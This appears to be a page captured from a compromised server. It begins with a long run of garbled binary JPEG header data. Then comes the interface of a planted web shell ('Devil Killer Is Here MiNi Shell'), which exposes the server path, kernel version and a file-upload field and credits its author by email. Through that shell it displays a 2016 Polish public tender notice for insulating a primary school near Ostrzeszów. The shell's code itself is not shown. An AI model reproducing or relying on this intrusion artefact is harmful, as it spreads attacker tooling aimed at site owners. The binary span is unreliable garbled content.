JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160120/13396-N-2016.html

<p class="kh_header"><b>Ostrzeszów: Przedmiot zamówienia obejmuje wykonanie częściowego ocieplenia budynku Szkoły Podstawowej                 w Niedźwiedziu wraz z wykonaniem elewacji całego budynku szkoły i sali gimnastycznej                             oraz wykonaniem prac towarzyszących.</b><br>
<b>Numer ogłoszenia: 13396 - 2016; data zamieszczenia: 20.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Placówek Oświatowych , ul. Zamkowa 31, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 062 7320678, faks 062 7320679.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje wykonanie częściowego ocieplenia budynku Szkoły Podstawowej                 w Niedźwiedziu wraz z wykonaniem elewacji całego budynku szkoły i sali gimnastycznej                             oraz wykonaniem prac towarzyszących..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie częściowego ocieplenia budynku Szkoły Podstawowej                 w Niedźwiedziu wraz z wykonaniem elewacji całego budynku szkoły i sali gimnastycznej                             oraz wykonaniem prac towarzyszących..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.11.00.00-1, 45.21.41.00-1, 45.31.23.11-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 4.000,00 zł.                         (słownie: cztery tysiące złotych).
Wadium należy wnieść przed upływem terminu składania ofert tj. najpóźniej do dnia 08.02.2016 r. do godz. 1200</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby niniejszego zamówienia nie wymaga posiadania przez wykonawcę szczególnie specjalnych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz robót budowlanych wykonanych w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; 
Przez pojęcie najważniejszych robót, zamawiający rozumie roboty budowlane w cyklu               ciągłym - tj. ocieplenie ścian budynku płytami styropianowymi metodą lekką w pełnym zakresie technologicznym w określonym systemie producenta o powierzchni ścian  min. 600,00 m2  (sześćset). 
Wykonawca musi wykazać że, wykonał w tym okresie minimum 1 takie zamówienia w okresie pięciu lat przed upływem składania ofert i podobne z zakresem/rodzajem niniejszego zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu o którym mowa w art. 22 ust. 1                  ustawy PZP; (wg wzoru zał. nr 2 do siwz);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem kadrowym (osobami zdolnymi do wykonania zamówienia);
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
Należy przedstawić:
a)	informacje na temat osoby - kierownika robót z uprawnieniami budowlanymi w specjalności robót ogólnobudowlanych bez ograniczeń w zakresie wykonawstwa, która będzie pełniła obowiązki kierownika budowy; 
b)	oświadczenie, że osoba - kierownik robót, wskazany w wykazie który będzie uczestniczył                                 w wykonywaniu zamówienia posiada wymagane uprawnienia określone odrębnymi przepisami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu o którym mowa w art. 22 ust. 1                  ustawy PZP; (wg wzoru zał. nr 2 do siwz);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe dokumenty, które wykonawca winien dołączyć do oferty:
Formularz ofertowy;  (wg wzoru zał. nr 1 do siwz);
Pełnomocnictwo/a rodzajowe lub szczegółowe do reprezentacji w postępowaniu o udzielenie zamówienia publicznego osób upoważnionych do składania oświadczeń woli w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów (jeśli zostały udzielone). Pełnomocnictwo/a winno być złożone w oryginale lub w formie odpisu potwierdzonego notarialnie.
Oryginał lub potwierdzona kserokopia dowodu wniesienia wadium w pieniądzu. 
(jeśli wcześniej nie został złożony przed upływem terminu składania ofert)
Oryginał dowodu wniesienia wadium w innej formie niż pieniężna. 
(jeśli wcześniej nie został złożony przed upływem terminu składania ofert)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Przedłużenie minimalnego okresu gwarancji jakości - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa zostanie podpisana według treści i warunków ustalonych we wzorze stanowiącym                          (zał. nr 9 do siwz); wraz z jej załącznikami;
Umowa zostanie zawarta w formie pisemnej w terminie wskazanym w art. 94 ust. 1 pkt 2 oraz art. 94 ust. 2 pkt 1 lit. a oraz pkt 3 lit. a ustawy Prawo zamówień publicznych. O miejscu i terminie podpisania umowy Zamawiający powiadomi pisemnie.
Zamawiający dopuszcza na podstawie art. 144 ust. 1 ustawy PZP istotne zmiany treści umowy                     w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy: 
W zakresie zmiany kluczowego personelu wykonawcy odpowiedzialnego za realizację przedmiotu zamówienia; tj. kierownika robót z uprawnieniami budowlanymi w specjalności robót ogólnobudowlanych w zakresie wykonawstwa, która będzie pełniła obowiązki kierownika budowy; 
Zmiana ta może wynikać z inicjatywy Wykonawcy lub Zamawiającego w każdym uzasadnionym przypadku; Wymagana jest wcześniejsza pisemna zgoda Zamawiającego, który dokonuje                                 akceptacji tego specjalisty w oparciu o przyjęte warunki  określone w siwz;                                                                                                       W zakresie dokonanej zmiany wymagany jest Aneks do Umowy;
W zakresie zmiany przepisów prawa w trakcie realizacji przedmiotu zamówienia;                             Dotyczyć to może np. zmiany stawki podatku VAT lub innych przepisów prawa                                 na które Zamawiający i Wykonawca nie mają wpływu w trakcie realizacji przedmiotu zamówienia;  W zakresie dokonanej zmiany wymagany jest Aneks do Umowy;
W zakresie zmian związanych z wynagrodzeniem Wykonawcy za wykonanie przedmiotu umowy; 
1.	Wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone, jeżeli w trakcie realizacji przedmiotu umowy, określone roboty budowlane, materiały, urządzenia lub inne składowe wchodzące w pierwotny zakres umowny - nie zostały wykonane, wbudowane lub zaniechano ich realizacji, bądź wykonano roboty zamienne powodujące pomniejszenie wartości umownej; Zmiana wynagrodzenia mniejszego niż określono                w umowie o realizację zamówienia publicznego - zostanie określona w oparciu                      o złożony kosztorys ofertowy na podstawie wskaźników cenotwórczych w nim zawartych; Wytyczne w zakresie sporządzenia kosztorysu określają przepisy Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. (DZ.U. nr 130 poz. 1389) dla kosztorysów inwestorskich; 
Rozliczenie tożsamego i mniejszego zakresu wykonanego przedmiotu umowy będzie się odbywało na podstawie złożonego kosztorysu ofertowego, który zostanie sprawdzony przez inspektora nadzoru budowlanego i przedstawiciela zamawiającego - zatwierdzających końcową wartość przedmiotu umowy; Inspektor nadzoru budowlanego i przedstawiciel Zamawiającego dokonają stosownych zmian i ewentualnych umniejszeń w zakresie niewykonanych pozycji kosztorysowych; W przypadku wykonania robót/pozycji zamiennych powodujących obniżenie ceny/lub zachowanie takiej samej ceny wykonania przedmiotu umowy - Wykonawca zobowiązany będzie do jego wykonania i wskazania różnic w stosunku do swojego kosztorysu ofertowego;
W zakresie dokonanej zmiany nie jest wymagany Aneks do Umowy;





2.	Wynagrodzenie Wykonawcy zostanie odpowiednio powiększone, o różnicę pomiędzy wartością przedmiotu umowy a dodatkowymi robotami budowlanymi zleconymi przez Zamawiającego powodującymi wzrost wynagrodzenia umownego;
Zamawiający na podstawie art. 67 ust. 1 pkt 5 ustawy PZP przewiduje możliwość udzielenia dotychczasowemu wykonawcy robót budowlanych - zamówień dodatkowych, nieobjętych zamówieniem podstawowym i niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
z przyczyn technicznych lub gospodarczych oddzielnie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów
lub
wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego.
Zmiana wynagrodzenia większego niż określono w umowie o realizację zamówienia publicznego - zostanie określona w oparciu o złożony kosztorys ofertowy na roboty dodatkowe metodą szczegółową na podstawie wskaźników cenotwórczych podanych             w złożonym kosztorysie ofertowym przed podpisaniem umowy; Wytyczne w zakresie sporządzenia kosztorysu określają przepisy Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. (DZ.U. nr 130 poz. 1389) dla kosztorysów inwestorskich; 
W zakresie dokonanej zmiany wymagany jest Aneks do Umowy;
W zakresie konieczności zmiany podwykonawcy lub podmiotu udostępniającego swoje zasoby             w zakresie określonym w ofercie wykonawcy; 
Sytuacja ta może mieć miejsce z konieczności zmiany podwykonawcy, którego Wykonawca wyznaczył do realizacji części zamówienia bądź podmiotu który udostępnił swoje zasoby w zakresie określonym w ofercie na potwierdzenie spełnienia warunków udziału w postępowaniu;
Wymagana jest pisemna zgoda zamawiającego na zmianę podwykonawcy po udokumentowaniu warunków niepodlegania wykluczeniu z udziału w postępowaniu. W przypadku podmiotów które udostępniły zasoby w zakresie określonym w warunkach udziału w postępowaniu, odpowiedniego dokumentu potwierdzającego udostępnienie zasobów;
                    W zakresie dokonanej zmiany podwykonawców wymagany jest Aneks do Umowy;
W zakresie dokonanej zmiany podmiotów które udostępniły zasoby nie jest wymagany Aneks                do Umowy tyko stosowne dokumenty określone w siwz;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrzeszow.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.nowoczesnagmina.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2016 godzina 12:00, miejsce: Ofertę należy przesłać - złożyć na adres zamawiającego:   Zakład Obsługi Placówek Oświatowych,                   ul. Zamkowa 31, 63 - 500 Ostrzeszów do dnia 08.02.2016 r., do godz. 1200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com